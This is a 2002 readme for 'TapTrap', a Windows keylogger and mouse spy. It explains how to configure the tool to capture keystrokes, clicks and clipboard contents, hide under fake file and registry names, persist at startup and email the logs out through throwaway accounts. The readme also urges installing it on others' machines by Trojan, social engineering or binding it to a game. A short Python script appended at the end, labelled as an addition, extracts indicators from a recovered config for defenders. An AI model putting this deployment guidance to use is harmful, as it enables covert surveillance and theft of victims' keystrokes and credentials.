by RattleSnake
Written in Visual C++
Released in April 2002
Project Name: TapTrap
Project Type: Keylogger and Mouse Spy
Project Compiler: Microsoft Visual C++ 6.0
Project Environment: Microsoft Windows 2000 Professional

Note: I will use the word "user" instead of "victim", just because this wasn't made to be c/p stuff for scriptkiddies. This is a piece of code which should help you understand C/C++ and the Windows API a bit more.

#include <stddisclaimer>

I do not support any illegal activities you perform with this software. Within this readme file I will explain TapTrap from the view of a malicious intruder, but you should only use the software for security auditing, securing your own machines or just to learn about the code. I am not responsible for anything you do with this program, malicious or not.

Now let's finally start ....

TapTrap is a keylogger which uses the Windows API to log:

a) Keystrokes as original ASCII characters, independent of the user's language.
b) Window names when being activated, so you know in which window / which context the buttons were pressed.
c) Mouse clicks. When the user clicks the button "Cancel" in some window with the left mouse button, TapTrap will record that the user clicked his left mouse button on a window class named "button" with the caption "Cancel". Fine, hm?
d) On Copy/Paste/Cut actions, TapTrap displays the contents of the user's clipboard.

Furthermore, the logs are sent to you from the remote user's machine automatically, using an email account specified by you or just trying different possible mailservers.

OK, you certainly want to know how to get it to work. There are only two steps necessary to set up the keylogger:

1) edit the configuration
2) run it on the remote machine

As soon as the program is run on the remote machine, it copies its executable and the configuration file to the system directory, runs this copy of itself and exits. It adds an entry to the registry to be executed at startup and starts logging immediately.
When an error occurs or the application closes due to other problems, it attempts to restart itself. When it has collected enough logfiles on the user's PC, it waits until the user connects to the internet and sends the files via email. The logs are stored in HTML format to make reading them rather comfortable.

I suppose whetting your appetite was successful already, so how to configure and run this baby?

1) Configuration
----------------

A configuration file, config.ini, comes with this program. Editing this file is the easy way to configure TapTrap, but the ini file has to be in the same directory as the executable when the program is run on the remote machine in order to make configuration possible.

The other way to configure TapTrap is to get a Windows compiler, edit the header file configure.h and compile, link and bind TapTrap again. However, only those of you who know how to code in C/C++ should do that. I assume those who know C/C++ also understand this header file, and thus I will only explain config.ini so far:

# Start Config ini sample
[mail_receiver]
[email protected]
display_name=RattleSnake
[mail_send]
[email protected]
password_required=yes
password=PASSWORD
[email protected]
server=mail.gmx.net
[makefile]
filename=\Win32Services.exe
registryname=Win32sstart
[limits]
autobackup=20
timermax=20
storelogs=5
# End Config ini sample

sendto_email is the email address that the keylogger's logs will be sent to.
display_name is your name. Enter anything you want ;).

Easy as a drunk nympho, quoting good old tuna - but how about the next section? Well, here you have to specify an email account to send the email from.

display_adress is the address of this account, password and username are password and username (duh) and server specifies the SMTP server (mailserver) of the provider. password and username are stored in plaintext, exactly - and they are only used if password_required is set to "yes".
I strongly suggest you do not use your own email account but create a new, fake account at yahoo, gmx or anywhere else. You can, however, also find an email server which allows you to send email anonymously and use that one.

If you want TapTrap to try out multiple mailservers - no problem!

# Start Config ini sample
...
[mail_send]
server=rome.ccomm.com;wisdom.psinet.net.au;emout17.mail.aol.com;mdr.de
# End Config ini sample

Exactly, you can simply add multiple servers by separating them with semicolons or commas. TapTrap will connect to each of them and send the email once it has connected successfully.

Now on to the makefile section. These are fake names for TapTrap when it writes itself to the system directory and the registry. filename has to start with a backslash, just because I am a lazy coder. Check the code if you are terribly interested.

filename is the name of the TapTrap executable within the remote user's system directory which will be run at startup.
registryname is the name of the entry in the remote user's registry which starts the executable at Windows startup.

Still with me? Good.

autobackup is the number of keys a user can press until the current logfile is backed up; this prevents losing all logged data when the program crashes somehow.

For all those of you who read and understand the code: timermax is used to randomize the timer loop which records the keytaps, check the code for more. Leave it as it is, that's what I would suggest. It should be a value between 15 and 50.

storelogs is more interesting, it defines how many logs are stored on the remote machine until TapTrap attempts to send them by email.

That's it. Configuration finished.

A little tip for Windows 2000 users:

- Press Start
- Enter "iexpress.exe"
- Click "Run"

You can use this setup client to create neat setup applications. Just add TapTrap.exe and the configuration file and choose TapTrap.exe as the installation command.
Make a self-extracting setup exe and use this one - Easy as a drunk nympho, right!

2) Run it on the remote machine
-------------------------------

Come on kids, use a Trojan, social engineer a bit and install it yourself, or just send it to rather stupid people. Or get a binder and bind it with some game, that's a nice idea as well ...

- RattleSnake

Server: size: 278.616 bytes
MegaSecurity
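
For defenders who recover a config.ini in the layout described under "1) Configuration", the following added example (not part of TapTrap or of the original readme) parses it and lists what to hunt for on the host and in mail egress logs. The sample values are constructed, and the default system directory C:\WINNT\system32 is an assumption for Windows 2000.

```python
import re

# Constructed sample in the layout the readme documents; addresses and hosts are made up.
SAMPLE_CONFIG = r"""
[mail_receiver]
sendto_email=collector@example.invalid
[mail_send]
display_adress=sender@example.invalid
password_required=yes
password=PLACEHOLDER
username=sender
server=smtp1.example.invalid;smtp2.example.invalid, smtp3.example.invalid
[makefile]
filename=\Win32Services.exe
registryname=Win32sstart
"""

def parse_config(text):
    """Parse [section] and key=value lines; '#' lines and damaged lines are skipped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.fullmatch(r"\[(\w+)\]", line)
        if header:
            current = sections.setdefault(header.group(1), {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            current[key.strip()] = value.strip()
    return sections

def triage_indicators(text, system_dir=r"C:\WINNT\system32"):
    """Turn a recovered config.ini into host and network items to check."""
    cfg = parse_config(text)
    send, make = cfg.get("mail_send", {}), cfg.get("makefile", {})
    # The readme allows several servers separated by semicolons or commas.
    servers = [s.strip() for s in re.split(r"[;,]", send.get("server", "")) if s.strip()]
    return {
        # filename starts with a backslash and is appended to the system directory.
        "dropped_file": system_dir + make.get("filename", ""),
        # Name of the startup entry; the readme does not say which registry key holds it.
        "startup_value_name": make.get("registryname"),
        "smtp_servers": servers,
        "smtp_account": send.get("display_adress"),
        "recipient": cfg.get("mail_receiver", {}).get("sendto_email"),
        "plaintext_credentials_present": send.get("password_required", "").lower() == "yes",
    }
```

When plaintext_credentials_present is true, the mailbox password sits in the recovered file, so the listed account should be reported to its provider as part of the response.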